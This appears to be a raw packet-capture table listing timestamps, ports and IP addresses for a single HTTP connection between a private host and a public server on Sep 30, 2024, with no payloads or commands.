Sep 30, 2024 15:10:14.654699087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654699087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654865980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.654889107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.655000925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.655021906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.655036926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.655036926 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.655091047 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.655148983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.655256033 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.655426025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.658749104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671008110 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671072960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671119928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671142101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671163082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671183109 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671309948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671309948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671339035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671392918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671411991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671432018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671478987 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671649933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671649933 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.671715021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671866894 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671886921 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671909094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.671989918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.672009945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672161102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.672328949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.672478914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672537088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672585011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672715902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672765017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672785044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672805071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672825098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672846079 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672864914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672883987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672920942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672940969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672960043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.672979116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673098087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673098087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673098087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673098087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673098087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673130035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673151970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673171997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673191071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673211098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673229933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673273087 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673341990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673362970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673383951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673403978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673424959 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673465967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673465967 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.673603058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673671007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673718929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673844099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673886061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673906088 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673927069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673947096 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.673966885 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674011946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674031973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674052954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674082994 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674139977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674160004 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674171925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674171925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674189091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674189091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674189091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674216986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674237967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674258947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674278975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674299002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674319983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674341917 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674359083 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674359083 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674397945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674417973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674437046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674489021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674508095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674526930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674547911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674555063 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674724102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674724102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674724102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.674762011 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674782991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674803019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.674823046 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675048113 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675060987 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675060987 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675095081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675115108 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675133944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675153017 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675172091 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675223112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675255060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675333977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675355911 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675374985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675395012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675400972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675400972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675447941 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675467014 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675487041 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675506115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675543070 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675570965 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675602913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675720930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675740004 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675740004 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.675753117 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675792933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675849915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675869942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675888062 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.675910950 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676081896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676081896 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676222086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676243067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676249981 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676279068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676300049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676320076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676341057 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676362038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676381111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676398993 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676419973 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676454067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676506042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676554918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676759005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676772118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676812887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676832914 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676851988 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676872015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676892042 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676912069 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676930904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676930904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.676949978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676973104 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.676994085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677014112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677033901 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677052975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677072048 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677092075 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677099943 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677148104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677164078 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677210093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677228928 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677248955 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677268028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677288055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677305937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677320957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677320957 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677340984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677360058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677377939 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677397966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677417040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677437067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677455902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677475929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677489042 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677505970 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677525997 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677546024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677565098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677584887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677603960 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677623034 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677642107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677659035 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677659035 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677659035 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677696943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677746058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677766085 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677784920 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677804947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677831888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677831888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677831888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.677851915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677872896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677891016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677912951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.677932978 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678047895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678051949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678051949 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678096056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678117037 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678209066 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678217888 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678240061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678258896 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678278923 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678297043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678390026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678390026 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678426027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678478003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678498030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678565025 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678615093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678675890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678726912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678731918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678731918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678731918 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678766966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678786039 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.678899050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.678899050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.679188013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679233074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679271936 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679291964 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679311991 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679330111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679347992 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679367065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679387093 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679585934 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679601908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.679601908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.679601908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.679601908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.679652929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679828882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679874897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679896116 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679914951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679934025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679953098 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679970980 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.679986000 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.680506945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.680506945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.680506945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.680660009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680680990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680702925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680721998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680740118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680757999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680775881 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.680880070 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.680983067 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681142092 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681382895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681509972 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681524038 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681555986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681677103 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681698084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681718111 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681737900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.681746006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681746006 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681965113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681965113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.681965113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.682423115 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682468891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682491064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682509899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682531118 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682554007 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682571888 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.682708979 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.682879925 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.683191061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683237076 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683310986 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683365107 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683386087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683408022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683427095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.683559895 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.683559895 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.683729887 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.684062958 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684190035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684240103 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.684386015 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684406996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684427977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684448957 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684469938 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684489965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.684506893 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.684683084 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.684683084 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.685115099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.685239077 CEST	49754	80	192.168.11.20	172.67.215.93
